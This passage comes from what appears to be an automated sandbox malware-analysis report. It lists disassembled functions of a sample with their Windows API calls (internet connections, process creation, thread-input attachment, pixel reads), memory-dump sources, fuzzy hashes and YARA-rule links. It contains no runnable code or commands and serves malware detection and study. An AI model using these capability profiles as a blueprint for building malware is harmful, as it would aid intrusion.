                                                • Opcode Fuzzy Hash: b3e36eef11fd9353a78fbddbf64c9f01ca6e78e73018568d6001206f3cd42481
                                                • Instruction Fuzzy Hash: 8E110A72904204FEDF05B7B4BC8ADBE7B6DEF81320F14415AF118A7292DE6D584247E5
                                                Function 007E187D Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E18B9
                                                  • Part of subcall function 007E1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1962
                                                  • Part of subcall function 007E1943: InternetCloseHandle.WININET(00000000), ref: 007E19FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
                                                • Instruction ID: b72f7821b5d16646ec6c6cb131c3eb100eb09cd2b3ddce6b0968df65ed3e4a9c
                                                • Opcode Fuzzy Hash: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
                                                • Instruction Fuzzy Hash: 12210431202685FFDB119F628C12F7AB7ADFF4C700F50402AFA1596251CB39E821D760
                                                Function 007D3A6E Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,007FFAC0), ref: 007D3AA8
                                                • GetLastError.KERNEL32 ref: 007D3AB7
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007D3AC6
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007FFAC0), ref: 007D3B23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: a246e2594bc0259de5637951fe18ade04e0990c8fe59302df2f6a2ea9e9437be
                                                • Instruction ID: 441808349b9010fa985f410378594dabcf389c515b4308a71bdb410a3085e887
                                                • Opcode Fuzzy Hash: a246e2594bc0259de5637951fe18ade04e0990c8fe59302df2f6a2ea9e9437be
                                                • Instruction Fuzzy Hash: B72160705082059F8710DF28D88486AB7F8EF55768F148A6BF499C73A1DB38DE45CB87
                                                Function 007F5D7A Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F5DE9
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F5E03
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F5E11
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F5E1F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 67f201f4d8b4f4e70fabcd7747b155de117b1663571eaca01477f01b3c832658
                                                • Instruction ID: 49031e2d71fcd74237c7034c83c8ef85ac248cca89b803477936349a7720566e
                                                • Opcode Fuzzy Hash: 67f201f4d8b4f4e70fabcd7747b155de117b1663571eaca01477f01b3c832658
                                                • Instruction Fuzzy Hash: 2D11D331305914AFDB14AB24CC49FBA7799EF85320F148119FB1ADB3E2CB68AD00CB94
                                                Function 007A5262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 007A5281
                                                  • Part of subcall function 0079588C: __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079588C: __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079588C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: b4bf6c5efaadb27562f4c555ff65c0d2faab3ac1b574b66b1695429cf4fcdbd1
                                                • Instruction ID: be9b0a12ae474fbd4ecb49359a8560504d9485c1a2f79403e7f8eeac87c95000
                                                • Opcode Fuzzy Hash: b4bf6c5efaadb27562f4c555ff65c0d2faab3ac1b574b66b1695429cf4fcdbd1
                                                • Instruction Fuzzy Hash: 7D11A773506A15EBDF213F70BC0976E3798BF87361B204A39F905DA291DE3C89408765
                                                Function 00774531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 00774560
                                                  • Part of subcall function 0077410D: _memset.LIBCMT ref: 0077418D
                                                  • Part of subcall function 0077410D: _wcscpy.LIBCMT ref: 007741E1
                                                  • Part of subcall function 0077410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007741F1
                                                • KillTimer.USER32(?,00000001,?,?), ref: 007745B5
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007745C4
                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007AD5FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: 0fff45439af37689553ea460439cf63798dd1f95e890700fe0da83003872ea96
                                                • Instruction ID: 89bcaea6e939bbb7b23397c97fd033dfd456a8b5548f8f9021f413dc74439a9a
                                                • Opcode Fuzzy Hash: 0fff45439af37689553ea460439cf63798dd1f95e890700fe0da83003872ea96
                                                • Instruction Fuzzy Hash: 112126B0904784AFEF328B24C859BE7BBECAF42308F04409EE69E56241D7785E94CB51
                                                Function 007E647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007E64AF
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E64BA
                                                • _memmove.LIBCMT ref: 007E64E7
                                                • inet_ntoa.WSOCK32(?), ref: 007E64F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: a9b8568c7ae93e87f3b2b5f1e486cd9d38eb08429d4e772edd69d3bc179bc2a2
                                                • Instruction ID: 01d7e24743ba1f678bf7e3920d5da8b2dc635acd832eac7f79a10633b064273a
                                                • Opcode Fuzzy Hash: a9b8568c7ae93e87f3b2b5f1e486cd9d38eb08429d4e772edd69d3bc179bc2a2
                                                • Instruction Fuzzy Hash: 47115171900508EFCF04EBA4DD8ADAE77B9AF18350B148165F606A7261DF78AE14CB61
                                                Function 007C8E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007C8E23
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E35
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E4B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8E66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
                                                • Instruction ID: ee885f44ea6deb33d47fba7b93110abeb7ef7705f0f6dc37682f840121397783
                                                • Opcode Fuzzy Hash: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
                                                • Instruction Fuzzy Hash: 8A111879901218FFEB11DFA5C885FADBBB8FF48710F204199E904B7290DA716E10DB94
                                                Function 00771290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 007712D8
                                                • GetClientRect.USER32(?,?), ref: 007AB77B
                                                • GetCursorPos.USER32(?), ref: 007AB785
                                                • ScreenToClient.USER32(?,?), ref: 007AB790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: ec209892661de93b06ae54520e915311cd314b2655d7431b6c8c59db75cc574c
                                                • Instruction ID: 77e72dc9162bac59668095c0049970453615cc2ae3c92ea9ab09509554b2d711
                                                • Opcode Fuzzy Hash: ec209892661de93b06ae54520e915311cd314b2655d7431b6c8c59db75cc574c
                                                • Instruction Fuzzy Hash: F3112B35A00119EBCF10DF98D8899BE77B8FF45340F408456FA05E7251CB38AA55DBA9
                                                Function 007D1473 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D1490
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14B5
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14BF
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,007D001E,?,007D1071,?,00008000), ref: 007D14F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 88d53ad815598692c91cb97f0659a74ad4b9733f639647ae6502f2b654f6510e
                                                • Instruction ID: 05cdba0ee3bafca5c8e50ac9cbe4c1630ad10e473d65063f5e4864fcba31b37d
                                                • Opcode Fuzzy Hash: 88d53ad815598692c91cb97f0659a74ad4b9733f639647ae6502f2b654f6510e
                                                • Instruction Fuzzy Hash: FD113C32D0056DEBCF009FE5D948AEEBB78FF09711F418156E940B6340CB389550DB95
                                                Function 007CDB40 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007CDB5C
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007CDB73
                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007CDB88
                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007CDBA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                • Opcode ID: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
                                                • Instruction ID: ac76bb15c3a691b97a121bb0f5af4da686ed80130f24e8ebed37726d73a8fe37
                                                • Opcode Fuzzy Hash: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
                                                • Instruction Fuzzy Hash: 701179B1201704EBE3308F10DC48FA3BBB8EF00B10F10856DAA56C6040DBB8ED14EBA5
                                                Function 007A7137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: d2352d67c116494129cf4013bd6054a981c54a7dda866982e81be20bd7ad6944
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: B0018C3214814EFBCF1A5E84CC058EE3FA6BF9A345B088615FE1858130C33AC9B1EB81
                                                Function 007FB2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007FB318
                                                • ScreenToClient.USER32(?,?), ref: 007FB330
                                                • ScreenToClient.USER32(?,?), ref: 007FB354
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB36F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
                                                • Instruction ID: a6a12df3c0908fe795f6ab4d48976e8291b878a856b51ffe9869802095220ecd
                                                • Opcode Fuzzy Hash: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
                                                • Instruction Fuzzy Hash: F6113475D00209EFDB41CF98C4849EEBBB5FF08210F108166E914E2220DB35AA55CF54
                                                Function 007FB669 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 007FB678
                                                • _memset.LIBCMT ref: 007FB687
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00836F20,00836F64), ref: 007FB6B6
                                                • CloseHandle.KERNEL32 ref: 007FB6C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
                                                • Instruction ID: e1dab048817948c26c05f20a41826e089bf9653f2b01576cc178079c32df7d50
                                                • Opcode Fuzzy Hash: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
                                                • Instruction Fuzzy Hash: CDF0D0B6540708BBE6102769BC05F777A5DFF45754F008425BB08D5196EB795C2087A8
                                                Function 007D6C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 007D6C8F
                                                  • Part of subcall function 007D776D: _memset.LIBCMT ref: 007D77A2
                                                • _memmove.LIBCMT ref: 007D6CB2
                                                • _memset.LIBCMT ref: 007D6CBF
                                                • LeaveCriticalSection.KERNEL32(?), ref: 007D6CCF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: b5a1c718e0e478038b1ec0831ab5e635da3b14a99a1e0e301ea5f63cd30bfb60
                                                • Instruction ID: 3cce53e8dd9294ec7ee7ae8b09db8f2bf81b1481ca62a9421a8b32388fe4e043
                                                • Opcode Fuzzy Hash: b5a1c718e0e478038b1ec0831ab5e635da3b14a99a1e0e301ea5f63cd30bfb60
                                                • Instruction Fuzzy Hash: 23F0303A100104EBCF416F55EC89A49BB2AFF45320F04C065FE085E21ACB35A911CBB5
                                                Function 007CA15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CA179
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007CA18C
                                                • GetCurrentThreadId.KERNEL32 ref: 007CA193
                                                • AttachThreadInput.USER32(00000000), ref: 007CA19A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: 0b09c6c47615a47a775f5ba3edfb44436ac088c847173edd91ee098cd1c32272
                                                • Instruction ID: 5e1e29fca060eb963a0ac29f8e6c5a978e7a7e710707580521e723a8195efa46
                                                • Opcode Fuzzy Hash: 0b09c6c47615a47a775f5ba3edfb44436ac088c847173edd91ee098cd1c32272
                                                • Instruction Fuzzy Hash: 6BE0C93154522CBBDB205BA2DC0DFE77F6CEF267A2F448029F509D90A0CE798940CBA5
                                                Function 00772218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00772231
                                                • SetTextColor.GDI32(?,000000FF), ref: 0077223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00772250
                                                • GetStockObject.GDI32(00000005), ref: 00772258
                                                • GetWindowDC.USER32(?,00000000), ref: 007AC003
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007AC010
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 007AC029
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 007AC042
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC062
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC06D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
